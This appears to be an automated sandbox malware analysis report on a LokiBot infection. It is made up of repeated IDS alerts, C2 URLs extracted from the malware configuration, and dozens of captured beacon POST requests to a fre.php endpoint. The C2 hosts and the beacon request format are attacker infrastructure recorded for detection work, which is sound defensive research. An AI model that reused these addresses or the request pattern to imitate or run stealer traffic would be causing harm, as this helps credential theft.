                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49825 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49826 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49826 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49826 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49827 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49827 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49827 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49828 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49828 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49828 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49829 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49829 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49829 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49830 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49830 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49830 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49831 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49831 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49831 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49832 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49832 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49832 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49833 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49833 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49833 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49834 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49834 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49834 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49835 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49835 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49835 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49837 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49837 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49837 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49839 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49839 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49839 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49840 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49840 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49840 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49841 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49841 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49841 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49842 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49842 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49842 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49843 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49843 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49843 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49844 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49844 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49844 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49845 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49845 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49845 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49846 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49846 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49846 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49847 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49847 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49847 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49848 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49848 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49848 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49849 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49849 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49849 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49850 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49850 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49850 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49851 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49851 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49851 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49852 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49852 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49852 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49853 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49853 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49853 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49854 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49854 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49854 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49855 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49855 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49855 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49856 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49856 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49856 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49857 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49857 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49857 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49858 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49858 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49858 -> 203.170.84.89:80
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                  Source: Malware configuration extractorURLs: https://www.ritcophysiotherapy.com.au/wap121/five/fre.php
                  Source: Joe Sandbox ViewASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 190Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 190Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
